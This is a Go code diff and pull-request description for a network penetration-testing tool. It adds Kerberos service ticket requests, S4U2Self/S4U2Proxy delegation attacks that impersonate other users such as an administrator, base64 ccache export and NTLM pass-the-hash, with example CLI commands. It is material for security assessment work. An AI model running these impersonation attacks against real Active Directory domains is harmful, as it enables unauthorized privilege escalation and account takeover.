+		// Step 3: Perform S4U2Proxy to get service ticket for target SPN
+		err = s4uManager.PerformS4U2Proxy(ctx, requestingUser, userDomain, impersonateUser, tgt, s4u2SelfTicket, sessionKey, spn)
+		if err != nil {
+			return "", fmt.Errorf("S4U2Proxy failed: %v", err)
+		}
+
+		log.Debug("Successfully performed S4U2Proxy")
+	} else {
+		// Regular service ticket request without impersonation
+		_, _, err := tm.Client.GetServiceTicket(spn)
+		if err != nil {
+			return "", fmt.Errorf("failed to get service ticket: %v", err)
+		}
+
+		log.Debug("Successfully obtained service ticket")
+	}
+
+	// Step 4: Generate base64 encoded ccache
+	var ticketPrincipal string
+	if impersonateUser != "" {
+		ticketPrincipal = impersonateUser
+	} else {
+		ticketPrincipal = requestingUser
+	}
+
+	ticketBase64, err := tm.GenerateTicketBase64(ticketPrincipal, strings.ToUpper(userDomain), spn)
+	if err != nil {
+		return "", fmt.Errorf("failed to generate ticket: %v", err)
+	}
+
+	return ticketBase64, nil
+}
+
+// GenerateTicketBase64 generates the acquired ticket as a base64-encoded ccache
+func (tm *TicketManager) GenerateTicketBase64(impersonateUser, userDomain, spn string) (string, error) {
+	// Create ccache
+	cache := credentials.NewV4CCache()
+	clientPrincipal := types.NewPrincipalName(nametype.KRB_NT_PRINCIPAL, impersonateUser)
+	principal := credentials.NewPrincipal(clientPrincipal, userDomain)
+	cache.SetDefaultPrincipal(principal)
+	cache.SetKDCTimeOffset(0xFFFFFFFF, 0)
+
+	// Save the service ticket
+	err := tm.Client.SaveSPNToCCache(cache, clientPrincipal, userDomain, spn, "")
+	if err != nil {
+		return "", fmt.Errorf("failed to save SPN to ccache: %v", err)
+	}
+
+	// Marshal ccache to bytes
+	cacheBytes, err := cache.Marshal()
+	if err != nil {
+		return "", fmt.Errorf("failed to marshal ccache: %v", err)
+	}
+
+	// Encode as base64
+	ticketBase64 := base64.StdEncoding.EncodeToString(cacheBytes)
+
+	return ticketBase64, nil
+}
+
+// GetTGT retrieves a Ticket Granting Ticket for the specified domain
+func (tm *TicketManager) GetTGT(userDomain string) (messages.Ticket, types.EncryptionKey, error) {
+	return tm.Client.GetTGT(strings.ToUpper(userDomain))
+}

--- a/internal/protocol/smb/client.go
+++ b/internal/protocol/smb/client.go
@@ -277,7 +277,7 @@ func (c *Client) ConnectWithContext(ctx context.Context) error {
 		// Use hash if available, otherwise use password
 		if c.NTLMHash != "" {
 			processor := ntlm.NewHashProcessor()
-			ntHash, err := processor.ProcessHashForSMB(c.NTLMHash)
+			ntHash, err := processor.ParseNTLMHash(c.NTLMHash)
 			if err != nil {
 				return fmt.Errorf("failed to process NTLM hash for SMB: %v", err)
 			}


### PR DESCRIPTION
### TL;DR

Added Kerberos service ticket functionality to the network scanning tool, supporting regular ticket requests and delegation attacks.

### What changed?

- Added a new Kerberos module to the pentest command with support for service ticket requests
- Implemented S4U2Self and S4U2Proxy functionality for Kerberos delegation attacks
- Created Fern schema definitions for Kerberos operations
- Added CLI flags for Kerberos authentication and service ticket requests
- Refactored NTLM hash parsing function to be more reusable across protocols
- Integrated the Kerberos module into the main pentest engine

### How to test?

1. Run a basic service ticket request:
```
networkscan pentest service kerberos --targets DC.domain.com:88 --actions SERVICE_TICKET --usernames user --passwords pass --domain domain.com --spn HTTP/server.domain.com
```

2. Test delegation attack with impersonation:
```
networkscan pentest service kerberos --targets DC.domain.com:88 --actions SERVICE_TICKET --usernames user --passwords pass --domain domain.com --spn HTTP/server.domain.com --impersonate admin
```

3. Use NTLM hash instead of password:
```
networkscan pentest service kerberos --targets DC.domain.com:88 --actions SERVICE_TICKET --usernames user --ntlm-hash HASH --domain domain.com --spn HTTP/server.domain.com
```

### Why make this change?

This change extends the network scanning tool's capabilities to include Kerberos-based attacks, which are critical for comprehensive Active Directory security assessments. The implementation supports both standard service ticket requests and advanced delegation attacks (S4U2Self and S4U2Proxy), allowing security testers to identify and exploit Kerberos delegation misconfigurations in enterprise environments.